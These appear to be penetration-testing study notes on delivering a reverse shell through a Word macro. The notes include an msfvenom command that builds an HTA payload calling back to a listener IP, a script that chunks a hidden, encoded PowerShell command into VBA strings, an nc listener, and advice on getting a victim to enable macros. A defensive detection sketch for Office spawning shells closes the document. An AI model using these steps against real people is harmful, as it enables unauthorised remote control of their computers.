MSOffice macro attack

Kind of an outdated technique; better options are available using Metasploit / Cobalt Strike.

Using macros for attacks: open Word → View → Macros

Create a new macro

We must save the containing document as either .docm or the older .doc format, which supports embedded macros, but must avoid the .docx format, which does not support them.

Save on Desktop

Click on EvilMacro and enable content to trigger the script

Macro triggers cmd.exe

#Using PowerShell and a Base64-encoded payload to get a reverse shell

sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.177 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta

Edit the EvilMacro

Since VBA has a limit on the length of strings, we have to split the command into chunks before running the exploit.

#Python3 script

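# Command to split (the encoded payload is truncated here)
cmd = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."

n = 50  # chunk length in characters

# Emit one VBA concatenation line per chunk
for i in range(0, len(cmd), n):
    print('Str = Str + "' + cmd[i:i+n] + '"')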

#Insert the macro

Start a nc listener on port 4444

nc -nvlp 4444

You have to save the document in the Word 1997-2003 format, as later versions are not vulnerable.

Open the file and enable macros

In an engagement scenario the victim has to be enticed to click on it and enable macros (unlikely).

Catch the revshell
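The chain above (Word spawning cmd.exe, or powershell.exe with -nop -w hidden -e) is visible in process-creation telemetry. The following detection sketch is an added example, not part of the original notes. The event field names, the sample events, and the wider list of Office parents and script-host children are assumptions that go beyond the single case shown here.

```python
import re

# Constructed process-creation events; field names are assumptions for this
# example (map them to your EDR or Sysmon Event ID 1 fields).
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": WORD, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"parent": WORD, "image": PS,
     "cmdline": "powershell.exe -nop -w hidden -e <BASE64_PLACEHOLDER>"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"parent": WORD, "image": r"C:\Windows\splwow64.exe", "cmdline": "splwow64.exe 8192"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell accepts abbreviated parameter names, so match the short and long forms.
PS_FLAGS = {
    "no_profile": re.compile(r"(?i)\s-nop\w*\b"),
    "hidden_window": re.compile(r"(?i)\s-w\w*\s+hidden\b"),
    "encoded_command": re.compile(r"(?i)\s-e(nc\w*|c)?\s+\S+"),
}

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def flag_office_child(event):
    """Return the reasons an event looks like macro-driven execution, else []."""
    parent, child = basename(event["parent"]), basename(event["image"])
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return []
    reasons = [f"{parent} spawned {child}"]
    if child == "powershell.exe":
        reasons += [name for name, rx in PS_FLAGS.items() if rx.search(event["cmdline"])]
    return reasons

def scan(events):
    """Return (index, reasons) for every event that is flagged."""
    return [(i, r) for i, e in enumerate(events) if (r := flag_office_child(e))]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(index, "; ".join(reasons))
```

The parent/child relationship alone is the higher-signal indicator; the PowerShell flag matches are supporting context for triage rather than a standalone rule.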
